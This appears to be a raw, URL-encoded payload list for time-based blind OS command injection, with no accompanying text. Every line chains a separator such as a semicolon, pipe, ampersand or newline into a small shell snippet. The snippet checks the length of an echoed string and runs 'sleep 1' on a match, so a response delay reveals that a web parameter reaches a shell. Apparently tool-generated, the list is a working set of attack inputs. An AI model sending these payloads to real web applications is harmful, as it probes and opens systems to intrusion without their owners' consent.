+%7C%20%5B%208%20-ne%20%24%28echo%20JNNROP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20// +%7C%20%5B%209%20-ne%20%24%28echo%20JNNROP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20// +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LVVACM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20// +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LVVACM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20// +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LVVACM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20// +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LVVACM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20// +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LVVACM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20// +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LVVACM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20// +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LVVACM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20// +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LVVACM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20// +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LVVACM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20// +%0A%20str%3D%24%28echo%20YCSCIW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20// +%0A%20str%3D%24%28echo%20YCSCIW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20// +%0A%20str%3D%24%28echo%20YCSCIW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20// +%0A%20str%3D%24%28echo%20YCSCIW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20// +%0A%20str%3D%24%28echo%20YCSCIW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20// +%0A%20str%3D%24%28echo%20YCSCIW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20// +%0A%20str%3D%24%28echo%20YCSCIW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20// +%0A%20str%3D%24%28echo%20YCSCIW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20// +%0A%20str%3D%24%28echo%20YCSCIW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20// +%3B%20str%3D%24%28echo%20YBRDJI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C +%3B%20str%3D%24%28echo%20YBRDJI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C +%3B%20str%3D%24%28echo%20YBRDJI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C +%3B%20str%3D%24%28echo%20YBRDJI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C +%3B%20str%3D%24%28echo%20YBRDJI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C +%3B%20str%3D%24%28echo%20YBRDJI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C +%3B%20str%3D%24%28echo%20YBRDJI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C +%3B%20str%3D%24%28echo%20YBRDJI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C +%3B%20str%3D%24%28echo%20YBRDJI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C +%7C%20%5B%201%20-ne%20%24%28echo%20RUNALC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C +%7C%20%5B%202%20-ne%20%24%28echo%20RUNALC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C +%7C%20%5B%203%20-ne%20%24%28echo%20RUNALC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C +%7C%20%5B%204%20-ne%20%24%28echo%20RUNALC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C +%7C%20%5B%205%20-ne%20%24%28echo%20RUNALC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C +%7C%20%5B%206%20-ne%20%24%28echo%20RUNALC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C +%7C%20%5B%207%20-ne%20%24%28echo%20RUNALC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C +%7C%20%5B%208%20-ne%20%24%28echo%20RUNALC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C +%7C%20%5B%209%20-ne%20%24%28echo%20RUNALC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XDTLTK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XDTLTK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XDTLTK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XDTLTK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XDTLTK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XDTLTK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XDTLTK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XDTLTK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XDTLTK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C +%0A%20str%3D%24%28echo%20BYUJUS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C +%0A%20str%3D%24%28echo%20BYUJUS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C +%0A%20str%3D%24%28echo%20BYUJUS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C +%0A%20str%3D%24%28echo%20BYUJUS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C +%0A%20str%3D%24%28echo%20BYUJUS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C +%0A%20str%3D%24%28echo%20BYUJUS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C +%0A%20str%3D%24%28echo%20BYUJUS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C +%0A%20str%3D%24%28echo%20BYUJUS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C +%0A%20str%3D%24%28echo%20BYUJUS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C +%3B%20str%3D%24%28echo%20KJYOKW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26 +%3B%20str%3D%24%28echo%20KJYOKW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26 +%3B%20str%3D%24%28echo%20KJYOKW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26 +%3B%20str%3D%24%28echo%20KJYOKW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26 +%3B%20str%3D%24%28echo%20KJYOKW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26 +%3B%20str%3D%24%28echo%20KJYOKW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26 +%3B%20str%3D%24%28echo%20KJYOKW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26 +%3B%20str%3D%24%28echo%20KJYOKW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26 +%3B%20str%3D%24%28echo%20KJYOKW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26 +%7C%20%5B%201%20-ne%20%24%28echo%20SQHKCG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26 +%7C%20%5B%202%20-ne%20%24%28echo%20SQHKCG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26 +%7C%20%5B%203%20-ne%20%24%28echo%20SQHKCG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26 +%7C%20%5B%204%20-ne%20%24%28echo%20SQHKCG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26 +%7C%20%5B%205%20-ne%20%24%28echo%20SQHKCG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26 +%7C%20%5B%206%20-ne%20%24%28echo%20SQHKCG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26 +%7C%20%5B%207%20-ne%20%24%28echo%20SQHKCG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26 +%7C%20%5B%208%20-ne%20%24%28echo%20SQHKCG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26 +%7C%20%5B%209%20-ne%20%24%28echo%20SQHKCG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GZNGDE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GZNGDE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GZNGDE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GZNGDE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GZNGDE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GZNGDE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GZNGDE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GZNGDE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GZNGDE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26 +%0A%20str%3D%24%28echo%20GRGSHX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26 +%0A%20str%3D%24%28echo%20GRGSHX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26 +%0A%20str%3D%24%28echo%20GRGSHX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26 +%0A%20str%3D%24%28echo%20GRGSHX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26 +%0A%20str%3D%24%28echo%20GRGSHX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26 +%0A%20str%3D%24%28echo%20GRGSHX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26 +%0A%20str%3D%24%28echo%20GRGSHX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26 +%0A%20str%3D%24%28echo%20GRGSHX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26 +%0A%20str%3D%24%28echo%20GRGSHX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26 +%3B%20str%3D%24%28echo%20OKKNHF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C +%3B%20str%3D%24%28echo%20OKKNHF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C +%3B%20str%3D%24%28echo%20OKKNHF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C +%3B%20str%3D%24%28echo%20OKKNHF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C +%3B%20str%3D%24%28echo%20OKKNHF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C +%3B%20str%3D%24%28echo%20OKKNHF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C +%3B%20str%3D%24%28echo%20OKKNHF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C +%3B%20str%3D%24%28echo%20OKKNHF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C +%3B%20str%3D%24%28echo%20OKKNHF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C +%7C%20%5B%201%20-ne%20%24%28echo%20DAJIYU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C +%7C%20%5B%202%20-ne%20%24%28echo%20DAJIYU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C +%7C%20%5B%203%20-ne%20%24%28echo%20DAJIYU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C +%7C%20%5B%204%20-ne%20%24%28echo%20DAJIYU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C +%7C%20%5B%205%20-ne%20%24%28echo%20DAJIYU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C +%7C%20%5B%206%20-ne%20%24%28echo%20DAJIYU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C +%7C%20%5B%207%20-ne%20%24%28echo%20DAJIYU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C +%7C%20%5B%208%20-ne%20%24%28echo%20DAJIYU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C +%7C%20%5B%209%20-ne%20%24%28echo%20DAJIYU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IYHUSO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IYHUSO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IYHUSO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IYHUSO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IYHUSO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IYHUSO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IYHUSO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IYHUSO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IYHUSO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C +%0A%20str%3D%24%28echo%20VILFSX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C +%0A%20str%3D%24%28echo%20VILFSX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C +%0A%20str%3D%24%28echo%20VILFSX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C +%0A%20str%3D%24%28echo%20VILFSX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C +%0A%20str%3D%24%28echo%20VILFSX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C +%0A%20str%3D%24%28echo%20VILFSX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C +%0A%20str%3D%24%28echo%20VILFSX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C +%0A%20str%3D%24%28echo%20VILFSX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C +%0A%20str%3D%24%28echo%20VILFSX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C +%3B%20str%3D%24%28echo%20OLJBSU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527 +%3B%20str%3D%24%28echo%20OLJBSU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527 